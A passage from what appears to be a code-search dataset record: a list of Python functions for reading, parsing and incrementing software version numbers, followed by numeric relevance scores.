prototype)\"", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def minor_version(self):\n return self.unpack_dword(0x18)", "def get_min_build_version(version: str) -> str:\n return Version(version).replace(micro=0).get_stable().dumps()", "def get_ilo_firmware_version_as_major_minor(self):\n try:\n manager, reset_uri = self._get_ilo_details()\n ilo_fw_ver_str = (\n manager['Oem']['Hp']['Firmware']['Current']['VersionString']\n )\n return common.get_major_minor(ilo_fw_ver_str)\n except Exception:\n return None", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return 
get_increased_base_version(2)", "def current_master_version(self) -> str:\n return pulumi.get(self, \"current_master_version\")", "def browser_version_major(self):\n # type: () -> string_types\n return self._browser_version_major", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def get_uni_version(self):\n version, major_version = None, None\n response = self.get_resource(category=VERSION, no_version=True)\n if response and response.get('version'):\n version = response['version']\n version_list = version.split('.')\n major_version = version_list[0][1:] + version_list[1]\n return version, major_version", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def commcare_minor_release(self):\n return '%d.%d' % self.build_spec.minor_release()", "def version_number() -> int:\n return 0", "def version(self):\n 
return \"%d.%d\" % (self._vmajor, self._vminor)", "def version():\n return '%d.%d' % (sys.version_info[0], sys.version_info[1])", "def getCurrentVersion():\n f_version = configManagement.currentVersion()\n return f_version", "def get_stable(self: _R) -> _R:\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def latestidd():\n pth, _ = run_functions.install_paths(\n version=\"8.8.0\"\n ) # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith(\"EnergyPlus\")]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def get_version():\n major=c_int_t(0)\n minor=c_int_t(0)\n patch=c_int_t(0)\n safe_call(backend.get().af_get_version(c_pointer(major), c_pointer(minor), c_pointer(patch)))\n return major.value,minor.value,patch.value", "def semver():\n return \".\".join([str(v) for v in VERSION])", "def getversion():\n major_ = ctypes.c_int32()\n minor_ = ctypes.c_int32()\n revision_ = ctypes.c_int32()\n res = __library__.MSK_XX_getversion(ctypes.byref(major_),ctypes.byref(minor_),ctypes.byref(revision_))\n if res != 0:\n raise Error(rescode(res),Env.getcodedesc(rescode(res))[1])\n major_ = major_.value\n _major_return_value = major_\n minor_ = minor_.value\n _minor_return_value = minor_\n revision_ = revision_.value\n _revision_return_value = revision_\n return (_major_return_value,_minor_return_value,_revision_return_value)", "def get_version():\n return '.'.join(map(str, VERSION))", "def get_current_version(self) -> str:\n raise NotImplementedError()", "def get_version():\r\n return __version__", "def latestidd():\n pth, _ = run_functions.install_paths(version='8.8.0') # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith('EnergyPlus')]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def parse_version_major(bin_path):\n version = parse_version(bin_path)\n return int(version.split(\".\")[0]) if version else None", "def get_major_dot_minor_version(version):\n return '.'.join([str(v) for v in version[:2]])", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is not implemented\")", "def get_version(self):\r\n\r\n return self.versions[0].number", "def version_major_minor(version_string):\n return '.'.join(version_string.split('.')[0:2])", "def get_version():\n return \"4.{}\".format(__version__)", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return harmony.__version__", "def _getMajorMinorVersion( self, sVersion ):\n\n\t\ttry:\n\t\t\trgs = sVersion.split( '.' 
)\n\t\t\tif len( rgs ) == 2:\n\t\t\t\treturn sVersion\n\n\t\t\treturn rgs[ 0 ] + '.' + rgs[ 1 ]\n\n\t\texcept Exception, e:\n\t\t\terrMsg( 'error getting major.minor version' )\n\t\t\terrMsg( e )\n\t\t\treturn ''", "def get_install_requires_version():\n require_str = \"pyscaffold>={major}.{minor}a0,<{next_major}.0a0\"\n major, minor, *rest = (parse_version(pyscaffold_version)\n .base_version.split('.'))\n next_major = int(major) + 1\n return require_str.format(major=major, minor=minor, next_major=next_major)", "def fpga_major():\n return int, None", "def operatingsystem_version_major(self):\n # type: () -> string_types\n return self._operatingsystem_version_major", "async def version(self):\n self.do(\"version\")\n return (await self.read(7)).strip()", "def test_major(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[0] = int(new_version_parts[0]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is False", "def minimum_engine_version(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum_engine_version\")", "def version():\n return uname().version", "def version():\n return uname().version", "def get_major_version(version, separator=\".\"):\n major = version.split(separator)[0]\n if not major.isdigit():\n raise ValueError(\"Major version must be numerical\")\n return \"{0}{1}0{1}0\".format(major, separator)", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def version_minor(self):\n assert self._version_patch != NotImplemented\n return self._version_patch", "def api_version() -> APIVersion:\n return MAX_SUPPORTED_VERSION", "def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def get_helm_major_version():\n client_helm_cmd = [\"helm\", \"version\", \"-c\", \"--short\"]\n client_version = (\n subprocess.check_output(client_helm_cmd).decode(\"utf-8\")\n )\n\n helm_version_major = client_version.split(\".\")[0]\n\n if \"Client:\" in helm_version_major:\n helm_version_major = helm_version_major.split(\":\")[-1].strip()\n\n return helm_version_major", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n latest_scenefile = 
matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def Hello(self):\n version = '1.5.3'\n print 'returned version number', version\n return version", "def bump_minor(self: _R, inc: int = 1) -> _R:\n if not self.is_stable and self.micro == 0:\n return self.get_stable().bump_minor(inc - 1)\n\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor + inc, 0),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def find_xcode_major_version():\n cmd = ['xcodebuild', '-version']\n command_trace.log(cmd)\n\n result = str(subprocess.check_output(cmd))\n version = result.split('\\n', 1)[0]\n version = re.sub(r'Xcode ', '', version)\n version = re.sub(r'\\..*', '', version)\n return int(version)", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def query_version(self):\n return self.connection.cursor().execute('SELECT version()').fetchone()[0]", "def test_major(self):\n self.assertEqual(\"0\", self._version1.major())\n self.assertEqual(\"1.2\", self._version2.major())", "def get_version():\n return magpy.get_version()", "def get_current_version(self):\n current_version = self.get_version(self.get_module_and_path(self._main_dir))\n return current_version" ]
[ "0.82029897", "0.7808802", "0.72779334", "0.71113545", "0.7102261", "0.702806", "0.69866174", "0.69342357", "0.6925223", "0.69188356", "0.6805731", "0.67799294", "0.6777864", "0.66487956", "0.6535175", "0.6533176", "0.6531343", "0.65151787", "0.6488693", "0.6478734", "0.6450406", "0.64389133", "0.6403514", "0.6397337", "0.63150984", "0.63063884", "0.6301425", "0.62677336", "0.6260517", "0.6254892", "0.62528235", "0.6210452", "0.6187552", "0.6166631", "0.6164366", "0.6121601", "0.61165035", "0.6115675", "0.60939026", "0.6086578", "0.6059126", "0.6029422", "0.60282934", "0.6026213", "0.6024582", "0.6005794", "0.5987706", "0.59840506", "0.5980633", "0.597934", "0.59762996", "0.5965682", "0.5954565", "0.5954387", "0.5954333", "0.59402084", "0.5929863", "0.5925896", "0.5918963", "0.59142137", "0.5899568", "0.5877947", "0.5877497", "0.5864922", "0.5850008", "0.5839436", "0.58373153", "0.58373153", "0.58373153", "0.5836612", "0.58305985", "0.5821922", "0.5813012", "0.581116", "0.5799678", "0.57976216", "0.57951117", "0.57875276", "0.57875276", "0.5786065", "0.57668364", "0.57668364", "0.57564086", "0.57528764", "0.5739582", "0.5732839", "0.5728381", "0.5727705", "0.572474", "0.572241", "0.5719349", "0.5717118", "0.57134646", "0.57116854", "0.5709893", "0.5705343", "0.5704035", "0.57034844", "0.5700886", "0.56869435" ]
0.63819283
24
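
Note on the record above: the bump_major document encodes a pre-release rule — bumping the major part of an unstable X.0.0 pre-release finalizes it to X.0.0 instead of jumping to (X+1).0.0. The sketch below reproduces just that rule, using the third-party packaging library (pip install packaging) only to parse version strings; the bump_major helper here is an illustrative reimplementation under that assumption, not the dataset's _replace/BaseVersion API.

from packaging.version import Version


def bump_major(v: Version, inc: int = 1) -> Version:
    # Pad the release tuple so short versions like "2.0" still unpack cleanly.
    major, minor, micro = (list(v.release) + [0, 0, 0])[:3]
    if v.is_prerelease and minor == 0 and micro == 0:
        # Finalizing an X.0.0 pre-release consumes one increment,
        # mirroring get_stable().bump_major(inc - 1) in the record.
        inc -= 1
    return Version(f"{major + inc}.0.0")


print(bump_major(Version("1.4.2")))     # 2.0.0
print(bump_major(Version("2.0.0rc1")))  # 2.0.0, not 3.0.0
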
Get next minor version.
def bump_minor(self: _R, inc: int = 1) -> _R: if not self.is_stable and self.micro == 0: return self.get_stable().bump_minor(inc - 1) return self._replace( BaseVersion( epoch=0, release=(self.major, self.minor + inc, 0), pre=None, post=None, dev=None, local=None, ) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def minor_version(self) -> str:\n return pulumi.get(self, \"minor_version\")", "def minor_version(self):\n return self.unpack_dword(0x18)", "def _getVersionMinor(self):\n return int(self.model.getroot().attrib['versionMinor'])", "def version_minor(self):\n assert self._version_patch != NotImplemented\n return self._version_patch", "def commcare_minor_release(self):\n return '%d.%d' % self.build_spec.minor_release()", "def version_max():\n return VERSION_MAX", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_ilo_firmware_version_as_major_minor(self):\n try:\n manager, reset_uri = self._get_ilo_details()\n ilo_fw_ver_str = (\n 
manager['Oem']['Hp']['Firmware']['Current']['VersionString']\n )\n return common.get_major_minor(ilo_fw_ver_str)\n except Exception:\n return None", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def operatingsystem_version_minor(self):\n # type: () -> string_types\n return self._operatingsystem_version_minor", "def browser_version_minor(self):\n # type: () -> string_types\n return self._browser_version_minor", "def fpga_minor():\n return int, None", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def version(self):\n return \"%d.%d\" % (self._vmajor, self._vminor)", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def test_release_update_available_MINOR(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def latestidd():\n pth, _ = run_functions.install_paths(\n version=\"8.8.0\"\n ) # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith(\"EnergyPlus\")]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def latest_version(self):\n from leonardo_system.pip import check_versions\n return check_versions(True).get(self.name, None).get('new', None)", "def latestidd():\n pth, _ = run_functions.install_paths(version='8.8.0') # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith('EnergyPlus')]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def _getMajorMinorVersion( self, sVersion ):\n\n\t\ttry:\n\t\t\trgs = sVersion.split( '.' 
)\n\t\t\tif len( rgs ) == 2:\n\t\t\t\treturn sVersion\n\n\t\t\treturn rgs[ 0 ] + '.' + rgs[ 1 ]\n\n\t\texcept Exception, e:\n\t\t\terrMsg( 'error getting major.minor version' )\n\t\t\terrMsg( e )\n\t\t\treturn ''", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def test_minor(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[1] = int(new_version_parts[1]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def minor_version_auto_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"minor_version_auto_upgrade\")", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def get_version():\n return 1", "def get_major_version(version):\n return str(check_version(version)[0])", "def major_version(self) -> str:\n return pulumi.get(self, \"major_version\")", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def minor_version(self, minor_version):\n\n self._minor_version = minor_version", "def minor_version(self, minor_version):\n\n self._minor_version = minor_version", "def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def get_version():\n click.echo(get_current_version_number())", "def get_version():\n return '%d.%d.%d' % version_info", "def version_min():\n return VERSION_MIN", "def get_runtime_minor_version(deps_path):\n with open(deps_path, 'r') as src:\n content = json.load(src)\n try:\n libraries = content['libraries']\n for key in libraries:\n if key.lower().startswith(NETCORE_APP_PREFIX):\n version = key[len(NETCORE_APP_PREFIX):]\n return version.split('-')[0]\n except KeyError:\n return None", "def test_minor(self):\n self.assertEqual(1, self._version1.minor())\n self.assertEqual(3, self._version2.minor())", "def get_version(self):\r\n\r\n return self.versions[0].number", "def version_major_minor(version_string):\n return '.'.join(version_string.split('.')[0:2])", "def major_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"major_version\")", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def get_host_os_sub_minor(self):\n\t\treturn call_sdk_function('PrlSrvCfg_GetHostOsSubMinor', self.handle)", "def major_version(self) -> Optional[pulumi.Input[str]]:\n return 
pulumi.get(self, \"major_version\")", "def major_version(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"major_version\")", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def _next_version(self, dirpath: str) -> int:\n try:\n version_re = re.compile(r\"version_(\\d+)\")\n\n def is_valid_version(v: str):\n return version_re.search(v) is not None\n\n versions = tuple(filter(is_valid_version, os.listdir(dirpath)))\n if not versions:\n # No versions yet\n return 0\n current_version = natsorted(versions, reverse=True)[0]\n # Get the version number using the version pattern\n current_version = int(version_re.search(current_version).group(1))\n return current_version + 1\n except Exception as e:\n logger.warning(f\"Starting from version 0 because of error: {e}\")\n return 0", "def get_latest_version(model: str) -> str:\n if model in {\"small\", \"medium\", \"large\"}:\n model = f\"da_dacy_{model}_trf\"\n versions = [mdl.split(\"-\")[-1] for mdl in models_url if mdl.startswith(model)]\n versions = sorted(\n versions,\n key=lambda s: [int(u) for u in s.split(\".\")],\n reverse=True,\n )\n return versions[0]", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def get_host_os_minor(self):\n\t\treturn call_sdk_function('PrlSrvCfg_GetHostOsMinor', self.handle)", "def getversion():\n major_ = ctypes.c_int32()\n minor_ = ctypes.c_int32()\n revision_ = ctypes.c_int32()\n res = __library__.MSK_XX_getversion(ctypes.byref(major_),ctypes.byref(minor_),ctypes.byref(revision_))\n if res != 0:\n raise Error(rescode(res),Env.getcodedesc(rescode(res))[1])\n major_ = major_.value\n _major_return_value = major_\n minor_ = minor_.value\n _minor_return_value = minor_\n revision_ = revision_.value\n _revision_return_value = revision_\n return (_major_return_value,_minor_return_value,_revision_return_value)", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def major_version(self):\n return self.unpack_dword(0x14)", "def api_version() -> APIVersion:\n return MAX_SUPPORTED_VERSION", "def get_major_dot_minor_version(version):\n return '.'.join([str(v) for v in version[:2]])", "def latest_version(self) -> AwesomeVersion | None:\n return self.sys_updater.version_cli", "def find_latest_version(versions):\n\n highest_version = 0\n for version in versions:\n version = parse_version(version)\n\n if version > highest_version:\n highest_version = version\n\n return highest_version", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def version_number() -> int:\n 
return 0", "def get_version():\n return magpy.get_version()", "def get_latest_build(self):\n # Retrieve last sanity-checked build number (could be 0)\n self.get_last_sanity()\n\n # * List all build numbers for this version. Note this may include\n # builds for other versions, since all versions for a given\n # release share a build directory.\n # * Ignore builds above 50000, which are toy builds\n\n builds = [int(x) for x in os.listdir(self.ver_dir)\n if x.isdigit() and int(x) > self.last_bld and int(x) < 50000]\n builds.sort()\n\n # Check each build after last sanity-checked build\n bld_num = self.last_bld\n for build in builds:\n print (\"Checking build \" + str(build))\n if self.check_build(build):\n bld_num = build\n print(\"bld_num is now \" + str(bld_num))\n return bld_num", "def _major_version(self):\n version_tuple = StrictVersion(self.plugin.version).version\n major = '.'.join(map(str, version_tuple[:2]))\n\n return major", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def get_latest_ml_pipeline_version() -> str:\n\n return execute_query('''\n SELECT pipeline_version\n FROM ml_pipeline\n ORDER BY created_at DESC\n LIMIT 1\n ''')[0][0]", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return get_increased_base_version(2)", "def getCurrentVersion():\n f_version = configManagement.currentVersion()\n return f_version", "def get_latest_vsn(self):\n # The last version in the list should be the newest one.\n if len(self.versions) > 0:\n v = sorted(self.versions, key=lambda v: int(v['id']))[len(self.versions)-1]\n return self.get_version(v['id'])\n else: return None", "def test_minor_property(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n expected = 2\n\n self.assertEqual(v1.minor, expected)", "def CompExtension_getDefaultVersion():\n return _libsbml.CompExtension_getDefaultVersion()", "def python_branch():\n\n return _sys_version()[2]", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release 